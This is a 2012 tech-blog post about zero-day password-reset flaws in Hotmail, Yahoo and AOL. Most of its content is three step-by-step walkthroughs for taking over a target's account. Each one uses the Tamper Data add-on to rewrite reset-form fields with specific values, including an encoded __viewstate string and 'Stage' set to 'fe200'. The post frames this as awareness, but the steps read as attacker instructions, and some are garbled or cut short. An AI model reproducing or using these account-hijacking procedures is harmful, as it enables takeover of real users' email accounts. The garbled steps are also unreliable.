website statistics
1 Star2 Stars3 Stars4 Stars5 Stars (Rate This)
Loading...

Quite recently, a zero day vulnerability was found in Hotmail which would put the account security of a Hotmail user at jeopardy. The vulnerability allowed a hacker to reset the account’s password to his own choice and through this, lock out the actual owner of the account. That’s apparently the tip of an iceberg. Now, similar vulnerabilities have been found in AOL and Yahoo too.


The vulnerability actually utilizes the Tamper Data add-on. Through this add-on, the hacker is able to tackle the outgoing HTTP request from a browser the very moment the request is being sent. Then he is able to modify whatever data is being sent. In this way, if you try to reset your password, the hacker can gain access to this request, input his own password for resetting and then have the account’s password reset. As a result, you are locked out of your account and the hacker gains controls of it.

Given below is a detailed, step-by-step description of how the process is performed so that you may be well aware if it ever happens to you.

Vulnerability in Hotmail:

  • Go to https://maccount.live.com/ac/resetpwdmain.aspx
  • Enter the target email and then the 6 characters as verification
  • Initiate Tamper Data
  • Delete the element “SendEmail_ContinueCmd”
  • Replace Element  “__V_previousForm” with “ResetOptionForm”
  • Change “__viewstate” to “%2FwEXAQUDX19QDwUPTmV3UGFzc3dvcmRGb3JtZMw%2BEPFW%2Fak6gMIVsxSlDMZxkMkI”
  • Hit Ok and Type any new password that you like
  • Start Tamper Data again and “__V_SecretAnswerProof”

Vulnerability in Yahoo:

  • Browse to the link https://edit.yahoo.com/forgot .
  • Enter target email and 6 verification characters
  • Start Tamper Data
  • Change element  “Stage” to “fe200”
  • Hit Ok and then enter the new password
  • Start Tamper Data All in Element Z

Vulnerability in AOL:

  • Browse to the Reset page.
  • Enter target email and verification characters
  • Start Tamper Data
  • Change the element  “action” to “pwdReset”
  • Change the element  “isSiteStateEncoded” to “false”
  • Hit Ok and type new password
  • Start Tamper Data All in Element mdNO

[ttjad keyword=”best-selling-gadget”]


Six-year-old Boy May Achieve ‘The World’s Youngest Computer Programmer’ Title

Aatma Studio Imagines New Self-Destruct Feature In iPhone 5
You can also press the left/right arrow key on your keyboard to go to previous/next post
  On April 29, 2012(4 years, 0 months ago.)

You May Also Like:

What Do You Think?

Leave a Reply




Loading Facebook Comments ...

FTC Disclosure: Some of the links of this website are "affiliate links." This means if you click on the link and purchase the item, we will receive an affiliate commission.


Recent Search

Recent Tutorials

Check out the quickest way to enable or disable the Google Chrome notifications for Desktop if you are finding it a bit challenging.
Learn how to find out Apple iPhone's IMEI and Serial number even if your phone is stolen or you don't have the device on your hand.
Now you can set custom ringtones to individual skype contacts on android. It's easy to setup. Take a look.
Now you can install Microsoft's Cortana on Android devices. It's pretty easy to install. Follow the steps below, check the screenshot.
Want to install Android lollipop 5.0.2 on pc? This post is for you. It's pretty easy to install and run. Just take a look.
With our partnership with Mode Media, we just got a jump start. Here is our first story of hand picked curated content on Android Tutorials.
Want to change theme on android ? We will show you how to change theme on android. It will makes your phone looks like new and smart.
You can record your screen on android very easily. No root Required. All you have to need a pc and USB cable. Let's find out.
A simple tutorial on how-to block a phone number on Android device, without an external app. Its pretty easy and straight-forward. Take a look.
Here we will show how to take Screenshot on your Apple Watch.
Close You Have To Login
User:
Pass:
Login With »Login With TwitterLogin With Facebook